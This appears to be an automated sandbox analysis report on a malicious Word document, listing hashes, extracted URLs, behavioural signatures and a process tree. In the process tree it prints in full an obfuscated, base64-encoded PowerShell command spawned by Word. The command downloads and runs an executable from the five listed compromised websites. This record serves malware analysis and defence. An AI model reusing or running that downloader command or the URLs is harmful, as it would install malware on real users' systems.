Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
06-05-2024 20:20
General
-
Target
1e35156777f498663f05a328abcfba80_JaffaCakes118.doc
-
Size
123KB
-
MD5
1e35156777f498663f05a328abcfba80
-
SHA1
392937c8a098fcdca9d9cae58a5a05ec657f485f
-
SHA256
9de70af07f1659f32c9e7aeb00a61ba1b1ca8e7985f1d5a3cc4197f67e8675b6
-
SHA512
d259c69c274a7be8d768b426713336330b62bf94b836abcf38d4a5eeea24283242610b36ae7e488234482c73f2a76e6b98ea04603b2a13c68ef12c1b8acba0ef
-
SSDEEP
3072:S77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q/tr0mTOl:S77HUUUUUUUUUUUUUUUUUUUT52V8r0m6
Malware Config
Extracted
https://atlanticsg.com/wp-includes/fsfrz22_mkp29qlby-69478/
http://eastpennlandscape.com/css/qhJUtdBFvM/
http://mcs-interiors.co.uk/cgi-bin/MUbadZUIXD/
http://laderajabugo.navicu.com/wp-admin/6ohv5j_6m40d-4652183/
http://banphongresort.com/wp-includes/8hxbg02o_wkpvf-27459009/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e35156777f498663f05a328abcfba80_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy bypass -noprofile -e JABRAG4AZgB6AGoASAB3AD0AJwBGAGkAcQBMAGwAdwAnADsAJABOAGwATQBJAGQAawAgAD0AIAAnADcAMAA2ACcAOwAkAHcAcwBOAGQAMAA1AD0AJwBYAGgAUgBpAGkATwBQAGwAJwA7ACQAdQBVAEkARQBPAGYAMgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGwATQBJAGQAawArACcALgBlAHgAZQAnADsAJABaAEUAdwBCAFIAUwBPAD0AJwBuAEYAcAB6AGkAdwAnADsAJABUAHAAUwA0ADYAcwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBgAGUAdABgAC4AdwBFAGIAQwBgAGwASQBFAE4AdAA7ACQARAB3AGIAOQB6AHMAVwA9ACcAaAB0AHQAcABzADoALwAvAGEAdABsAGEAbgB0AGkAYwBzAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGYAcwBmAHIAegAyADIAXwBtAGsAcAAyADkAcQBsAGIAeQAtADYAOQA0ADcAOAAvAEAAaAB0AHQAcAA6AC8ALwBlAGEAcwB0AHAAZQBuAG4AbABhAG4AZABzAGMAYQBwAGUALgBjAG8AbQAvAGMAcwBzAC8AcQBoAEoAVQB0AGQAQgBGAHYATQAvAEAAaAB0AHQAcAA6AC8ALwBtAGMAcwAtAGkAbgB0AGUAcgBpAG8AcgBzAC4AYwBvAC4AdQBrAC8AYwBnAGkALQBiAGkAbgAvAE0AVQBiAGEAZABaAFUASQBYAEQALwBAAGgAdAB0AHAAOgAvAC8AbABhAGQAZQByAGEAagBhAGIAdQBnAG8ALgBuAGEAdgBpAGMAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgBvAGgAdgA1AGoAXwA2AG0ANAAwAGQALQA0ADYANQAyADEAOAAzAC8AQABoAHQAdABwADoALwAvAGIAYQBuAHAAaABvAG4AZwByAGUAcwBvAHIAdAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AOABoAHgAYgBnADAAMgBvAF8AdwBrAHAAdgBmAC0AMgA3ADQANQA5ADAAMAA5AC8AJwAuAHMAUABsAEkAdAAoACcAQAAnACkAOwAkAEIAUwAyAHAAbQA1AHQAPQAnAGgAegBuAFUAYQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAbQA4AHoAXwBHAFIAIABpAG4AIAAkAEQAdwBiADkAegBzAFcAKQB7AHQAcgB5AHsAJABUAHAAUwA0ADYAcwAuAEQAbwBXAE4ATABPAEEAZABmAEkATABFACgAJABHAGkAbQA4AHoAXwBHAFIALAAgACQAdQBVAEkARQBPAGYAMgB6ACkAOwAkAEwAUQBYADYAYQA2AD0AJwBoAEoAcwB6AHMAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHUAVQBJAEUATwBmADIAegApAC4ATABFAE4ARwB0AEgAIAAtAGcAZQAgADMAMwA2ADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJAB1AFUASQBFAE8AZgAyAHoAKQA7ACQATABTAEkAMwA0AEsARgA9ACcAaABjAEgANwBWAGYAJwA7AGIAcgBlAGEAawA7ACQATwBoADUAdABtAFkAbQA9ACcAbgBBADQAaQAyAEcAYQB1ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAWQBVAEYAUwBqAD0AJwBvAEcAcwB3AE4AdQAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD54efdad044bd02a0f446f1a41c295de6a
SHA1a9c34fd513297d7b087ff5e83bfb96cf9d4175cf
SHA256484834655b38e6b99a9e36d769d1ea01ddd819adf73a9ab8b827d46550cd9b5e
SHA51202f7e3a21bffe414dbb4a68f64d217ee4b5a07921ee4990db5c1fa596c51c6f68f3948e234448ad9f8d2bfd0ebe5195e66bed90ba6850ba6147e87db2631a971
-
Filesize
444B
MD5fee05342e6ae169e7b1ab3e4ac71b982
SHA172c5f94b7dca7d3beb62fe34fc21e1c27a7a53e2
SHA2562aa604b9f39527c71f3c5807372c2308a3777dfe6afc74d79181149525081aa3
SHA51273f1d830acdd8074434ad3a2b8f0b57c8cc773ad9e600196eeaff82b609ec2c5a096307e51f7536892d1ef3a38969ec1f87b82d9ef2d330a2ef9992e4ed26c3d
-
Filesize
20KB
MD598f3ef791021b7695038b71977e995f2
SHA1fa61756d9ff0b46a605b79431bdc344eaf41fe25
SHA25675637814566bc32887dfba21a7184e37f97bb18770fa32c41dd5543e6c1a8393
SHA5120ce72b39779c9eb2d4ce1e21d4264ca1dde969b6044dd138fa4ff63e6f4a9f50a1f0d4e14604cf056d84adcc0344f1e9feb84ee59c4ca5be4f936eb9f326d25d
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
2.9MB